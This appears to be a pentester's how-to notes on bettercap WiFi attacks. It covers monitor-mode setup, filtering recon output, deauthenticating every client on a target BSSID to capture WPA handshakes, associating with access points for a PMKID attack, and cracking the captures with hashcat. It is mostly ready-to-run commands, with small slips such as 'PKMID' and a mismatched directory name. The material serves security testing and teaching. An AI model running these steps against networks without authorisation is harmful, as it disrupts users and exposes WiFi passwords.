bettercap
bettercap is "The Swiss Army knife for WiFi, Bluetooth Low Energy, wireless HID hijacking, CAN-bus and IPv4 and IPv6 networks reconnaissance and MITM attacks."
Totally underconstruction while I review bettercap's CLI and see what's still relevant.
Connect USB wifi to ESXi/Proxmox
In ESXI, shut down the host, then add a new USB device and choose "Realtek 802.11n NIC"
Kill processes on the Kali VM that might screw stuff up:
Install aircrackng
sudo apt install aircrack-ng -y
Kill services that might conflict with wifi shenanigans
sudo airmon-ng check kill
Start monitoring on the wifi card
Enumerate your wifi interface
iwconfig
Using the name of your wifi interface, start it in monitoring mode
sudo airmon-ng start wlan0
Check what your new monitoring interface is
iwconfig
You'll likely see wlan0mon
or something similar
Install via Go (Ubuntu 24.04)
sudo apt update
sudo apt install -y pkg-config libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev -y
sudo apt install golang-go -y
go install github.com/bettercap/bettercap@latest
Install/run using Docker
sudo docker run -it --privileged --net=host bettercap/bettercap -iface wlan0
Set wifi capture file (warning: if you don't set this now and want to change it, you have to RESTART the wifi recon function)
set wifi.handshakes.file /root/captures.pcap
Set wifi.deauth acquired to true (optional)
What I found during testing is that I would capture a lot of "half" handshakes but never the full ones. After reading this Github [issue] (https://github.com/bettercap/bettercap/issues/889) I tried setting "set wifi.deauth.acquired true" and then I started getting full handshakes!
set wifi.deauth.acquired true
Get wifi recon going!
wifi.recon on
Troubleshooting tip
I've run into some issues getting the wifi.recon on
command to execute - due to some issues calling the iw
executable. But I don't know that that's the actual issue. Reading further, I'm having problems like this GitHub issue mentions where I try to put Bettercap into recon mode and it complains of [17:58:47] [sys.log] [war] wifi could not set interface wlan0 txpower to 30, 'Set Tx Power' requests not supported
. So I followed a recommendation in that article to install this driver like this:
sudo apt-get install dkms -y
cd ~/
git clone -b v5.6.4.2 https://github.com/aircrack-ng/rtl8812au.git
cd rtl
sudo make dkms_install
make && make install
Sort networks by # of clients connected
set wifi.show.sort clients desc
Every second, clear out our view and then present an updated list of nearby WiFi networks:
set ticker.commands 'clear; wifi.show'
Filter out client probes
events.ignore wifi.client.probe
Filter out client disconnections
events.ignore wifi.client.lost
Filter out new APs that come online
events.ignore wifi.ap.new
Filter out new clients that come online
events.ignore wifi.client.new
Filter out lost connections with APs
events.ignore wifi.ap.lost
Show networks that ONLY start with 7MS:
set wifi.show.filter ^7MS
Turn on ticker
ticker on
Set channel to the one you're attacking
wifi.recon.channel X
Disassociate all clients on a given BSSID to capture handshakes!
wifi.deauth 11:22:33:44:55:66
Assoc with target SSID to do the PKMID attack
wifi.assoc all
-or-
wifi.assoc 11:22:33:44:55:66
Clear SSID filter
set wifi.show.filter ^
Clear wifi.recon.channel filter
wifi.recon.channel clear
Figure out the container ID for bettercap
sudo docker ps
Copy files from docker to hard drive
First, make note of the ID (noted with "XXX" below). If you didn't change the default path, you should be able to see captured files in the /root folder. Try listing them with:
sudo docker exec XXX ls /root/
Now you can copy them out of the docker and into your current folder:
sudo docker cp XXX:/root/captures.pcap .
Convert .pcap files to hccapx files
sudo /usr/lib/hashcat-utils/cap2hccapx.bin wifi-handshakes.pcap wifi-handshakes-converted.hccapx
Crack w/hashcat!
sudo /path/to/hashcat -m2500 converted-file.hccapx wordlist.txt
If this doesn't work ^^^, it looks like the new standard hash type might be m22000 per this article. In that case, here's what I did on the pcap itself to get it ready for hashcat:
sudo /usr/bin/hcxpcapngtool -o readytocrack.hc22000 wifi-handshakes.pcap
One time I had problems with my .cap file from bettercap and had to do this to clean it up:
tshark -r my-cap-file-from-bettercap.cap -R "(wlan.fc.type_subtype == 0x00 || wlan.fc.type_subtype == 0x02 || wlan.fc.type_subtype == 0x04 || wlan.fc.type_subtype == 0x05 || wlan.fc.type_subtype == 0x08 || eapol)" -2 -F pcapng -w stripped.pcapng
Then convert from .pcapng
to .pcap
editcap -F pcap stripped.pcapng stripped.pcap